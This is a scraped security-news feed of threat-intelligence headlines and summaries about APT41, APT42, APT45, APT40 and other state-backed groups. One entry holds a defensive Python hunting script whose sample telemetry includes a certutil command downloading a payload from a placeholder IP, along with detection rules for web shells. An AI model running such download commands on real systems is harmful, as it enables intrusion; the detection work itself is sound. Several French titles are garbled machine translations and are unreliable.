www.secnews.physaphae.fr/article.php?IdArticle=8568711 False Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Medical,Cloud APT 41,APT 32 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Les pirates iraniens ont mis en place un nouveau réseau pour cibler les campagnes politiques américaines<br>Iranian Hackers Set Up New Network to Target U.S. Political Campaigns Cybersecurity researchers have unearthed new network infrastructure set up by Iranian threat actors to support activities linked to the recent targeting of U.S. political campaigns. Recorded Future\'s Insikt Group has linked the infrastructure to a threat it tracks as GreenCharlie, an Iran-nexus cyber threat group that overlaps with APT42, Charming Kitten, Damselfly, Mint Sandstorm (formerly]]> 2024-08-30T16:45:00+00:00 https://thehackernews.com/2024/08/iranian-hackers-set-up-new-network-to.html www.secnews.physaphae.fr/article.php?IdArticle=8566822 False Threat APT 35,APT 42 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) I Spy With My Little Eye: Uncovering an Iranian Counterintelligence Operation #### Targeted Geolocations - Israel ## Snapshot Mandiant has disclosed details of a counterintelligence campaign suspected to be linked to Iran, targeting Iranians and perceived domestic threats who may collaborate with foreign intelligence agencies, especially those in Israel. ## Description The operation aims to gather personal and professional data, potentially aiding Iranian intelligence in identifying collaborators with Iran\'s adversaries and tracking human intelligence (HUMINT) activities against Iran. The campaign likely targets Iranian dissidents, activists, and Farsi speakers both inside and outside Iran. Mandiant attributes the campaign to Iran with high confidence due to its tactics, techniques, and procedures (TTPs). 
Mandiant asseses there is some overlap with APT42, a known Iranian cyber-espionage group associated with the Islamic Revolutionary Guard Corps (IRGC) Intelligence Organization. The campaign disseminates over 35 fake recruitment websites via social media, posing as Israeli human resources firms to lure targets into providing sensitive information. The operation has been active since at least 2017 and has parallels with previous efforts targeting Arabic speakers linked to Syria and Hezbollah, suggesting a broader counterintelligence strategy. ## References [I Spy With My Little Eye: Uncovering an Iranian Counterintelligence Operation](https://cloud.google.com/blog/topics/threat-intelligence/uncovering-iranian-counterintelligence-operation/). Mandiant (accessed 2024-08-29) ## Copyright **© Microsoft 2024**. All rights reserved. Reproduction or distribution of the content of this site, or any part thereof, without written permission of Microsoft is prohibited.]]> 2024-08-30T15:08:41+00:00 https://community.riskiq.com/article/69325d88 www.secnews.physaphae.fr/article.php?IdArticle=8566940 False Cloud APT 42 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Les pirates utilisent désormais l'injection d'appdance pour laisser tomber les balises de Cobaltstrike<br>Hackers now use AppDomain Injection to drop CobaltStrike beacons 2024-08-28T20:46:51+00:00 https://community.riskiq.com/article/e3cd79c3 www.secnews.physaphae.fr/article.php?IdArticle=8565688 False Ransomware,Malware,Tool,Vulnerability,Threat,Technical APT 41 3.0000000000000000 Mandiant - Blog Sécu de Mandiant J'espionne avec mon petit œil: découvrir une opération de contre-espionnage iranienne<br>I Spy With My Little Eye: Uncovering an Iranian Counterintelligence Operation Today Mandiant is releasing details of a suspected Iran-nexus counterintelligence operation aimed at collecting data on Iranians and domestic threats who may be collaborating with intelligence and security agencies abroad, 
particularly in Israel.  The data collected by this campaign may support the Iranian intelligence apparatus in pinpointing individuals who are interested in collaborating with Iran\'s perceived adversarial countries. The collected data may be leveraged to uncover human intelligence (HUMINT) operations conducted against Iran and to persecute any Iranians suspected to be involved in these operations. These may include Iranian dissidents, activists, human rights advocates, and Farsi speakers living in and outside Iran. Mandiant assesses with high confidence this campaign was operated on behalf of Iran\'s regime, based on its tactics, techniques, and procedures (TTPs), themes, and targeting. In addition, we observed a weak overlap between this campaign and APT42, an Iran-nexus threat actor suspected to operate on behalf of Iran\'s IRGC Intelligence Organization (IRGC-IO). This campaign\'s activities are in line with Iran\'s IRGC and APT42\'s history of conducting surveillance operations against domestic threats and individuals of interest to the Iranian government. Despite the possible APT42 connection, Mandiant observed no relations between this activity and any U.S. elections-related targeting as previously reported by Google\'s Threat Analysis Group. The activity used multiple social media accounts to disseminate a network of over 35 fake recruiting websites containing extensive Farsi decoy content, including job offers and Israel-related lures, such as images of Israeli national symbols, hi-tech offices, and major city landmarks. Upon entry, the targeted users are required to enter their personal details as well as their professional and academic experience, which are subsequently sent to the attackers.  The suspected counterintelligence operations started as early as 2017 and lasted at least until March 2024. In the past, similar campaigns were deployed in Arabic, targeting individuals affiliated with Syria and Hezbollah intelligence and security agencies. 
This may indicate Iran\'s counterintelligence activities extend beyond its own security and intelligence apparatus, possibly in support of its allies in Syria and Lebanon.  Mandiant worked to help ensure this activity was blocked and disrupted, the threat actor\'s accounts were terminated, and Google Chrome users and the users of other browsers were protected.]]> 2024-08-28T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/uncovering-iranian-counterintelligence-operation/ www.secnews.physaphae.fr/article.php?IdArticle=8565655 False Threat,Mobile,Cloud APT 42 4.0000000000000000 Dark Reading - Informationweek Branch Les pirates utilisent de rares techniques furtives pour réduire les militaires asiatiques, Gov \\ 't orgs<br>Hackers Use Rare Stealth Techniques to Down Asian Military, Gov\\'t Orgs A threat actor resembling APT41 performed "AppDomainManager Injection," which is like DLL sideloading, but arguably easier and stealthier.]]> 2024-08-26T21:33:17+00:00 https://www.darkreading.com/application-security/hackers-use-rare-stealth-techniques-to-down-asian-military-govt-orgs www.secnews.physaphae.fr/article.php?IdArticle=8564337 False Threat APT 41 2.0000000000000000 ProofPoint - Cyber Firms Meilleurs plans posés: TA453 cible la figure religieuse avec un faux podcast invite livrant un nouvel ensemble d'outils de logiciel malveillant forgeron<br>Best Laid Plans: TA453 Targets Religious Figure with Fake Podcast Invite Delivering New BlackSmith Malware Toolset 2024-08-20T05:00:25+00:00 https://www.proofpoint.com/us/blog/threat-insight/best-laid-plans-ta453-targets-religious-figure-fake-podcast-invite-delivering www.secnews.physaphae.fr/article.php?IdArticle=8560720 False Malware,Threat,Studies APT 35,APT 42 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Faits saillants hebdomadaires OSINT, 19 août 2024<br>Weekly OSINT Highlights, 19 August 2024 2024-08-19T10:58:28+00:00 https://community.riskiq.com/article/256c3cbd 
www.secnews.physaphae.fr/article.php?IdArticle=8560248 False Ransomware,Malware,Tool,Threat,Prediction APT 41,APT 42 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Le groupe soutenu iranien interroge les campagnes de phishing contre Israël, aux États-Unis, les États-Unis<br>Iranian backed group steps up phishing campaigns against Israel, U.S. 2024-08-15T22:02:58+00:00 https://community.riskiq.com/article/97bee087 www.secnews.physaphae.fr/article.php?IdArticle=8558380 True Spam,Malware,Tool,Threat,Industrial APT 42 3.0000000000000000 Dark Reading - Informationweek Branch Google: le chaton charmant de l'Iran \\ cible les élections présidentielles américaines, militaire israélien<br>Google: Iran\\'s Charming Kitten Targets US Presidential Elections, Israeli Military The threat group tracked as APT42 remains on the warpath with various phishing and other social engineering campaigns, as tensions with Israel rise.]]> 2024-08-15T17:21:38+00:00 https://www.darkreading.com/cyberattacks-data-breaches/google-iran-charming-kitten-targets-presidential-elections-israeli-military www.secnews.physaphae.fr/article.php?IdArticle=8558263 False Threat APT 35,APT 42 3.0000000000000000 The Register - Site journalistique Anglais Google Raps Iran \\'s APT42 pour pleuvoir<br>Google raps Iran\\'s APT42 for raining down spear-phishing attacks US politicians and Israeli officials among the top targets for the IRGC\'s cyber unit Google has joined Microsoft in publishing intel on Iranian cyber influence activity following a recent uptick in attacks that led to data being leaked from the Trump re-election campaign.…]]> 2024-08-15T16:30:59+00:00 https://go.theregister.com/feed/www.theregister.com/2024/08/15/google_iran_apt42_campaigns/ www.secnews.physaphae.fr/article.php?IdArticle=8558233 False None APT 42 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Google met en garde contre les cyberattaques iraniennes sur les campagnes présidentielles<br>Google Warns of Iranian 
Cyber-Attacks on Presidential Campaigns Google has highlighted sophisticated spearphishing attacks by Iranian state actor APT42 targeting individuals associated with the US Presidential campaign]]> 2024-08-15T11:10:00+00:00 https://www.infosecurity-magazine.com/news/google-iranian-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8558090 False None APT 42 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Le Baku de la Terre soutenu par la Chine étend les cyberattaques en Europe, au Moyen-Orient et en Afrique<br>China-Backed Earth Baku Expands Cyber Attacks to Europe, Middle East, and Africa The China-backed threat actor known as Earth Baku has diversified its targeting footprint beyond the Indo-Pacific region to include Europe, the Middle East, and Africa starting in late 2022. Newly targeted countries as part of the activity include Italy, Germany, the U.A.E., and Qatar, with suspected attacks also detected in Georgia and Romania. Governments, media and communications, telecoms,]]> 2024-08-14T10:31:00+00:00 https://thehackernews.com/2024/08/china-backed-earth-baku-expands-cyber.html www.secnews.physaphae.fr/article.php?IdArticle=8557427 False Threat APT 41 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) A Dive into Earth Baku\'s Latest Campaign 2024-08-12T19:53:21+00:00 https://community.riskiq.com/article/23e31fb6 www.secnews.physaphae.fr/article.php?IdArticle=8556555 False Malware,Tool,Threat,Medical APT 41 3.0000000000000000 Dark Reading - Informationweek Branch L'interrogation APT41 étend la portée de l'acteur chinois au-delà de l'Asie<br>APT41 Spinoff Expands Chinese Actor\\'s Scope Beyond Asia Earth Baku, yet another subgroup of the highly active and increasingly sophisticated collective, is moving into EMEA with new malware and living-off-the-land (LOL) tactics.]]> 2024-08-12T14:30:31+00:00 
https://www.darkreading.com/cyberattacks-data-breaches/apt41-spinoff-expands-chinese-actor-scope-beyond-asia www.secnews.physaphae.fr/article.php?IdArticle=8557118 False Malware APT 41 3.0000000000000000 TrendLabs Security - Editeur Antivirus Une plongée dans la dernière campagne de la Terre Baku \\<br>A Dive into Earth Baku\\'s Latest Campaign Earth Baku has broadened its scope from the Indo-Pacific region to Europe, the Middle East, and Africa. In this blog entry, we examine the threat actor\'s latest tools, tactics, and procedures.]]> 2024-08-09T00:00:00+00:00 https://www.trendmicro.com/en_us/research/24/h/earth-baku-latest-campaign.html www.secnews.physaphae.fr/article.php?IdArticle=8554460 False Tool,Threat APT 41 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Des professeurs d'université ciblés par le groupe de cyber-espionnage nord-coréen<br>University Professors Targeted by North Korean Cyber Espionage Group The North Korea-linked threat actor known as Kimsuky has been linked to a new set of attacks targeting university staff, researchers, and professors for intelligence gathering purposes. Cybersecurity firm Resilience said it identified the activity in late July 2024 after it observed an operation security (OPSEC) error made by the hackers. 
Kimsuky, also known by the names APT43, ARCHIPELAGO,]]> 2024-08-08T21:01:00+00:00 https://thehackernews.com/2024/08/university-professors-targeted-by-north.html www.secnews.physaphae.fr/article.php?IdArticle=8554152 False Threat APT 43 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Les managers britanniques améliorent les cyber-connaissances, mais le personnel manque de formation<br>UK Managers Improve Cyber Knowledge but Staff Lack Training A new study from the Chartered Management Institute finds just half of firms offer regular security training]]> 2024-08-07T10:00:00+00:00 https://www.infosecurity-magazine.com/news/uk-managers-improve-cyber/ www.secnews.physaphae.fr/article.php?IdArticle=8553315 False Studies APT 42 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Faits saillants hebdomadaires, 5 août 2024<br>Weekly OSINT Highlights, 5 August 2024 2024-08-05T10:51:17+00:00 https://community.riskiq.com/article/ed438f56 www.secnews.physaphae.fr/article.php?IdArticle=8552050 False Ransomware,Spam,Malware,Tool,Vulnerability,Threat,Mobile APT33,APT 41,APT 33,APT-C-17 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Les pirates APT41 utilisent ShadowPad, Cobalt Strike in Taiwanais Institute Cyber ​​Attack<br>APT41 Hackers Use ShadowPad, Cobalt Strike in Taiwanese Institute Cyber Attack A Taiwanese government-affiliated research institute that specializes in computing and associated technologies was breached by nation-state threat actors with ties to China, according to new findings from Cisco Talos. The unnamed organization was targeted as early as mid-July 2023 to deliver a variety of backdoors and post-compromise tools like ShadowPad and Cobalt Strike. 
It has been attributed]]> 2024-08-02T22:02:00+00:00 https://thehackernews.com/2024/08/apt41-hackers-use-shadowpad-cobalt.html www.secnews.physaphae.fr/article.php?IdArticle=8549909 False Tool,Threat APT 41 3.0000000000000000 Dark Reading - Informationweek Branch L'APT41 de la Chine cible le Taiwan Research Institute for Cyber ​​Espionage<br>China\\'s APT41 Targets Taiwan Research Institute for Cyber Espionage The state-sponsored Chinese threat actor gained access to three systems and stole at least some research data around computing and related technologies.]]> 2024-08-02T19:20:49+00:00 https://www.darkreading.com/threat-intelligence/chinas-apt41-targets-taiwan-research-institute-for-cyber-espionage www.secnews.physaphae.fr/article.php?IdArticle=8550033 False Threat APT 41 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) APT41 a probablement compromis l'institut de recherche affilié au gouvernement taïwanais avec ShadowPad et Cobalt Strike<br>APT41 likely compromised Taiwanese government-affiliated research institute with ShadowPad and Cobalt Strike 2024-08-01T18:42:27+00:00 https://community.riskiq.com/article/d791dc39 www.secnews.physaphae.fr/article.php?IdArticle=8549111 False Malware,Tool,Vulnerability,Threat APT 41 3.0000000000000000 Recorded Future - FLux Recorded Future Organisation de recherche soutenue par le gouvernement de Taiwan ciblée par les pirates d'APT41<br>Taiwan government-backed research organization targeted by APT41 hackers 2024-08-01T17:27:04+00:00 https://therecord.media/taiwan-government-backed-research-institution-apt41-hack www.secnews.physaphae.fr/article.php?IdArticle=8549044 False None APT 41 3.0000000000000000 Mandiant - Blog Sécu de Mandiant APT45: Machine militaire numérique de la Corée du Nord<br>APT45: North Korea\\'s Digital Military Machine   Executive Summary APT45 is a long-running, moderately sophisticated North Korean cyber operator that has carried out espionage campaigns as early as 2009. 
APT45 has gradually expanded into financially-motivated operations, and the group\'s suspected development and deployment of ransomware sets it apart from other North Korean operators.  APT45 and activity clusters suspected of being linked to the group are strongly associated with a distinct genealogy of malware families separate from peer North Korean operators like TEMP.Hermit and APT43.  Among the groups assessed to operate from the Democratic People\'s Republic of Korea (DPRK), APT45 has been the most frequently observed targeting critical infrastructure. Overview Mandiant assesses with high confidence that APT45 is a moderately sophisticated cyber operator that supports the interests of the DPRK. Since at least 2009, APT45 has carried out a range of cyber operations aligned with the shifting geopolitical interests of the North Korean state. Although the group\'s earliest observed activities consisted of espionage campaigns against government agencies and defense industries, APT45 has expanded its remit to financially-motivated operations, including targeting of the financial vertical; we also assess with moderate confidence that APT45 has engaged in the development of ransomware. Additionally, while multiple DPRK-nexus groups focused on healthcare and pharmaceuticals during the initial stages of the COVID-19 pandemic, APT45 has continued to target this vertical longer than other groups, suggesting an ongoing mandate to collect related information. Separately, the group has conducted operations against nuclear-related entities, underscoring its role in supporting DPRK priorities. apt45 logo Shifts in Targeting and Expanding Operations Similar to other cyber threat activity attributed to North Korea-nexus groups, shifts in APT45 operations have reflected the DPRK\'s changing priorities. Malware samples indicate the group was active as early as 2009, although an observed focus on government agencies and the defense industry was observed beginning in 2017. 
Identified activity in 2019 aligned with Pyongyang\'s continued interest in nuclear issues and energy. Although it is not clear if financially-motivated operations are a focus of APT45\'s current mandate, the group is distinct from other North Korean operators in its suspected interest in ransomware. Given available information, it is possible that APT45 is carrying out financially-motivated cybercrime not only in support of its own operations but to generate funds for other North Korean state priorities. Financial Sector Like other North Korea]]> 2024-07-25T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/apt45-north-korea-digital-military-machine/ www.secnews.physaphae.fr/article.php?IdArticle=8544047 False Ransomware,Malware,Tool,Threat,Medical APT 37,APT 43 5.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Faits saillants hebdomadaires, 22 juillet 2024<br>Weekly OSINT Highlights, 22 July 2024 2024-07-22T10:33:31+00:00 https://community.riskiq.com/article/12ac549a www.secnews.physaphae.fr/article.php?IdArticle=8541988 False Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Prediction,Cloud APT 41 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) APT41 Has Arisen From the DUST 2024-07-19T18:51:32+00:00 https://community.riskiq.com/article/3ecd0e46 www.secnews.physaphae.fr/article.php?IdArticle=8540438 False Malware,Tool,Threat,Medical,Cloud APT 41 3.0000000000000000 Dark Reading - Informationweek Branch L'APT41 de la Chine cible la logistique mondiale, les sociétés de services publics<br>China\\'s APT41 Targets Global Logistics, Utilities Companies According to Mandiant, among the many cyber espionage tools the threat actor is using is a sophisticated new dropper called DustTrap.]]> 2024-07-19T14:00:00+00:00 https://www.darkreading.com/threat-intelligence/china-apt41-targets-global-logistics-utilities www.secnews.physaphae.fr/article.php?IdArticle=8540255 False Tool,Threat APT 41 3.0000000000000000 The Hacker News - 
The Hacker News est un blog de news de hack (surprenant non?) APT41 Infiltre les réseaux en Italie, en Espagne, à Taïwan, en Turquie et au Royaume-Uni.<br>APT41 Infiltrates Networks in Italy, Spain, Taiwan, Turkey, and the U.K. Several organizations operating within global shipping and logistics, media and entertainment, technology, and automotive sectors in Italy, Spain, Taiwan, Thailand, Turkey, and the U.K. have become the target of a "sustained campaign" by the prolific China-based APT41 hacking group. "APT41 successfully infiltrated and maintained prolonged, unauthorized access to numerous victims\' networks since]]> 2024-07-19T12:54:00+00:00 https://thehackernews.com/2024/07/apt41-infiltrates-networks-in-italy.html www.secnews.physaphae.fr/article.php?IdArticle=8540107 False None APT 41 3.0000000000000000 IndustrialCyber - cyber risk firms for industrial Détail mandiant et google tag APT41 Cyber ​​Campagne ciblant les industries mondiales<br>Mandiant and Google TAG detail APT41 cyber campaign targeting global industries La société de renseignement sur les menaces Mandiant en collaboration avec le groupe d'analyse des menaces de Google (TAG) a observé une campagne soutenue par le ...
>Threat intelligence firm Mandiant in collaboration with Google\'s Threat Analysis Group (TAG) observed a sustained campaign by the... ]]>
2024-07-19T10:54:39+00:00 https://industrialcyber.co/ransomware/mandiant-and-google-tag-detail-apt41-cyber-campaign-targeting-global-industries/ www.secnews.physaphae.fr/article.php?IdArticle=8540163 False Threat APT 41 3.0000000000000000
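The APT41 campaign that IndustrialCyber summarises here, and that Mandiant's own "APT41 Has Arisen From the DUST" entry in this feed spells out, is unusually concrete for a news item: web shells on an Apache Tomcat Manager host ran certutil.exe to fetch the DUSTPAN dropper, and SQLULDR2 was later used to copy data out of Oracle databases. The following is an added detection-side example, not Mandiant's, Google TAG's or IndustrialCyber's code. It runs three hunting rules over constructed, Sysmon-style process-creation events (Event ID 1 field names). The Tomcat service image names, the certutil switches (-urlcache -split -f) and the 203.0.113.10 address are assumptions for illustration; the report only states that the web shells executed certutil.exe to download the dropper.

```python
"""Hunt for the DUST-style chain: Tomcat web shell -> certutil download -> SQLULDR2 export.

Added example, not Mandiant's code. Input is constructed Sysmon-like process
creation telemetry as JSON lines. Field names follow Sysmon Event ID 1; the
Tomcat image names, certutil switches and IP address are assumptions.
"""
import json
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Constructed sample telemetry (not real data). Backslashes are JSON-escaped.
SAMPLE_EVENTS = r"""
{"UtcTime":"2024-03-02 10:01:00","Computer":"WEB01","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c dir","ParentImage":"C:\\Windows\\explorer.exe"}
{"UtcTime":"2024-03-02 10:02:00","Computer":"WEB01","Image":"C:\\Windows\\System32\\certutil.exe","CommandLine":"certutil.exe -verify C:\\certs\\leaf.cer","ParentImage":"C:\\Windows\\System32\\svchost.exe"}
{"UtcTime":"2024-03-02 10:03:00","Computer":"WEB01","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c whoami","ParentImage":"C:\\tomcat9\\bin\\tomcat9.exe"}
{"UtcTime":"2024-03-02 10:03:05","Computer":"WEB01","Image":"C:\\Windows\\System32\\certutil.exe","CommandLine":"certutil.exe -urlcache -split -f http://203.0.113.10/update.dat C:\\Windows\\Temp\\update.dat","ParentImage":"C:\\tomcat9\\bin\\tomcat9.exe"}
{"UtcTime":"2024-03-02 11:40:00","Computer":"DB01","Image":"C:\\Tools\\sqluldr2.exe","CommandLine":"sqluldr2.exe user=app/pw@ORCL query=\"select * from customers\" file=C:\\Windows\\Temp\\c.csv","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
"""

# Assumed Tomcat service images; a Tomcat JVM should not spawn these children
# in normal operation (tune both sets to the deployment).
TOMCAT_IMAGES = {"java.exe", "javaw.exe", "tomcat8.exe", "tomcat9.exe", "tomcat10.exe"}
SHELL_LIKE = {"cmd.exe", "powershell.exe", "certutil.exe", "whoami.exe", "net.exe", "bitsadmin.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    rule: str
    computer: str
    time: str
    detail: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return PureWindowsPath(path).name.lower()


def evaluate(event: dict) -> list[Finding]:
    """Apply the three DUST-chain rules to one process-creation event."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    meta = (event.get("Computer", "?"), event.get("UtcTime", "?"))
    hits = []
    # Rule 1: web-shell execution pattern, the JVM spawning a shell or LOLBin.
    if parent in TOMCAT_IMAGES and image in SHELL_LIKE:
        hits.append(Finding("WEBSHELL_CHILD", *meta, f"{parent} -> {image}: {cmdline}"))
    # Rule 2: certutil used as a downloader (URL in args or the urlcache switch).
    if image == "certutil.exe" and (URL_RE.search(cmdline) or "-urlcache" in cmdline.lower()):
        url = URL_RE.search(cmdline)
        hits.append(Finding("CERTUTIL_DOWNLOAD", *meta, url.group(0) if url else cmdline))
    # Rule 3: the bulk Oracle export tool the report names.
    if image == "sqluldr2.exe":
        hits.append(Finding("BULK_DB_EXPORT", *meta, cmdline))
    return hits


def hunt(jsonl: str) -> list[Finding]:
    """Run evaluate() over a JSON-lines blob, skipping blank or malformed lines."""
    findings = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        findings.extend(evaluate(event))
    return findings


def chained_hosts(findings) -> set[str]:
    """Hosts where a Tomcat-spawned process AND a certutil download both fired:
    the web-shell-to-dropper step of the chain, which merits immediate triage."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f.computer, set()).add(f.rule)
    return {h for h, rules in by_host.items() if {"WEBSHELL_CHILD", "CERTUTIL_DOWNLOAD"} <= rules}


if __name__ == "__main__":
    results = hunt(SAMPLE_EVENTS)
    for f in results:
        print(f"[{f.rule}] {f.computer} {f.time} {f.detail}")
    print("chained hosts:", sorted(chained_hosts(results)))
```

Run as a script to print the findings for the constructed events. The WEBSHELL_CHILD rule carries the signal: a Tomcat service process has no business spawning cmd.exe or certutil.exe, whereas the certutil rule alone also fires on administrators who use it as a downloader, which is why the two are correlated per host before escalation. In a SIEM the same logic maps onto a process-creation query that joins on the parent-process field.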
Mandiant - Mandiant security blog | APT41 Has Arisen From the DUST | Executive Summary: In collaboration with Google's Threat Analysis Group (TAG), Mandiant has observed a sustained campaign by the advanced persistent threat group APT41 targeting and successfully compromising multiple organizations operating within the global shipping and logistics, media and entertainment, technology, and automotive sectors. The majority of organizations were operating in Italy, Spain, Taiwan, Thailand, Turkey, and the United Kingdom. APT41 successfully infiltrated and maintained prolonged, unauthorized access to numerous victims' networks since 2023, enabling them to extract sensitive data over an extended period. APT41 used a combination of ANTSWORD and BLUEBEAM web shells for the execution of DUSTPAN, which in turn executed the BEACON backdoor for command-and-control communication. Later in the intrusion, APT41 leveraged DUSTTRAP, which would lead to hands-on-keyboard activity. APT41 used the publicly available tools SQLULDR2 for copying data from databases and PINEGROVE to exfiltrate data to Microsoft OneDrive. Overview: Recently, Mandiant became aware of an APT41 intrusion where the malicious actor deployed a combination of ANTSWORD and BLUEBEAM web shells for persistence. These web shells were identified on an Apache Tomcat Manager server and had been active since at least 2023. APT41 utilized these web shells to execute certutil.exe to download the DUSTPAN dropper, which stealthily loads BEACON. As the APT41 intrusion progressed, the group escalated its tactics by deploying the DUSTTRAP dropper. Upon execution, DUSTTRAP would decrypt a malicious payload and execute it in memory, leaving minimal forensic traces. The decrypted payload was designed to establish communication channels with either APT41-controlled infrastructure for command and control or, in some instances, with a compromised Google Workspace account, further blending its malicious activities with legitimate traffic. The affected Google Workspace accounts have been successfully remediated to prevent further unauthorized access. Furthermore, APT41 leveraged SQLULDR2 to export data from Oracle databases, and used PINEGROVE to systematically and efficiently exfiltrate large volumes of sensitive data from the compromised networks, transferring it to OneDrive to enable exfiltration and subsequent analysis. | 2024-07-18T14:00:00+00:00 | https://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust/ | www.secnews.physaphae.fr/article.php?IdArticle=8539580 | False | Ransomware,Malware,Tool,Threat,Patching,Medical,Cloud | APT 41 | 2.0

IndustrialCyber - cyber risk news for industrial sectors | Senator Warner pushes for immediate action on mandatory cybersecurity standards for healthcare sector | U.S. Senator Mark R. Warner calls upon the administration to swiftly develop and implement mandatory minimum cyber standards... | 2024-07-17T13:42:31+00:00 | https://industrialcyber.co/medical/senator-warner-pushes-for-immediate-action-on-mandatory-cybersecurity-standards-for-healthcare-sector/ | www.secnews.physaphae.fr/article.php?IdArticle=8538878 | False | Industrial,Medical | APT 42 | 3.0

RiskIQ - cyber risk firm (now Microsoft) | Weekly OSINT Highlights, 15 July 2024 | 2024-07-15T11:27:07+00:00 | https://community.riskiq.com/article/fdcb22e4 | www.secnews.physaphae.fr/article.php?IdArticle=8537522 | False | Ransomware,Malware,Tool,Vulnerability,Threat,Legislation,Prediction,Medical | APT 41,APT 40 | 2.0

The Register - British news site | China's APT41 crew adds a stealthy malware loader and fresh backdoor to its toolbox | Meet DodgeBox, son of StealthVector. Chinese government-backed cyber espionage gang APT41 has very likely added a loader dubbed DodgeBox and a backdoor named MoonWalk to its malware toolbox, according to cloud security service provider Zscaler's ThreatLabz research team. | 2024-07-12T01:29:11+00:00 | https://go.theregister.com/feed/www.theregister.com/2024/07/12/china_apt41_malware/ | www.secnews.physaphae.fr/article.php?IdArticle=8535375 | False | Malware,Cloud | APT 41 | 3.0

RiskIQ - cyber risk firm (now Microsoft) | DodgeBox: A deep dive into the updated arsenal of APT41 (Part 1) | Snapshot: In April 2024, Zscaler ThreatLabz discovered a new loader named DodgeBox, an upgraded and evolved version of StealthVector, a tool previously used by the Chinese APT group APT41, tracked by Microsoft as [Brass Typhoon](https://security.microsoft.com/intel-profiles/byExternalId/e49c4119afe798db103058c3ffda5bd85e83534940247449478524d61ae6817a). Description: After their analysis of DodgeBox, researchers from Zscaler ThreatLabz assess that the malware is an enhanced version of the StealthVector loader, as there are significant similarities between the two. Written in C, DodgeBox is a reflective DLL loader with a number of capabilities, including the ability to decrypt and load embedded DLLs, perform environment checks, and carry out cleanup procedures. Notably, DodgeBox also employs call stack spoofing, a technique used by malware to obfuscate the origins of API calls, making it difficult for Endpoint Detection and Response (EDR) solutions and antivirus programs to detect the malware. DodgeBox has been used by APT41 to deliver the MoonWalk backdoor, a new backdoor being employed by the threat group. DodgeBox and StealthVector both have similarities in their: checksum and configuration decryption; decrypted conf | 2024-07-11T22:03:33+00:00 | https://community.riskiq.com/article/3524d2ae | www.secnews.physaphae.fr/article.php?IdArticle=8535322 | False | Malware,Tool,Threat,Patching | APT 41 | 3.0

The Hacker News - a hacking news blog (surprising, isn't it?) | Chinese APT41 Upgrades Malware Arsenal with DodgeBox and MoonWalk | The China-linked advanced persistent threat (APT) group codenamed APT41 is suspected to be using an "advanced and upgraded version" of a known malware called StealthVector to deliver a previously undocumented backdoor dubbed MoonWalk. The new variant of StealthVector, which is also referred to as DUSTPAN, has been codenamed DodgeBox by Zscaler ThreatLabz, which discovered the loader strain in | 2024-07-11T18:01:00+00:00 | https://thehackernews.com/2024/07/chinese-apt41-upgrades-malware-arsenal.html | www.secnews.physaphae.fr/article.php?IdArticle=8534993 | False | Malware,Threat | APT 41 | 3.0

HackRead - cyber research | Five Eyes Alliance Accuses Chinese APT40 for Hacking Government Networks | Australia isn't alone! The Five Eyes (US, UK, Canada, NZ) along with Japan and South Korea join forces… | 2024-07-10T13:30:41+00:00 | https://hackread.com/five-eyes-blames-chinese-apt40-for-govt-hacks/ | www.secnews.physaphae.fr/article.php?IdArticle=8534284 | False | None | APT 40 | 3.0

RiskIQ - cyber risk firm (now Microsoft) | People's Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action | 2024-07-09T19:47:09+00:00 | https://community.riskiq.com/article/e8378a00 | www.secnews.physaphae.fr/article.php?IdArticle=8533748 | False | Malware,Tool,Vulnerability,Threat,Patching,Legislation,Industrial | APT 40 | 3.0

Dark Reading - Informationweek Branch | Chinese Threat Group APT40 Exploits N-Day Vulns at Rapid Pace | The state-sponsored threat group is capable of exploiting fresh software vulnerabilities within hours of their initial discovery. | 2024-07-09T17:08:06+00:00 | https://www.darkreading.com/endpoint-security/chinese-apt40-exploits-nday-vulns-rapid-pace | www.secnews.physaphae.fr/article.php?IdArticle=8533656 | False | Vulnerability,Threat | APT 40 | 3.0

InfoSecurity Mag - InfoSecurity Magazine | Chinese state actor APT40 exploits N-day vulnerabilities "within hours"
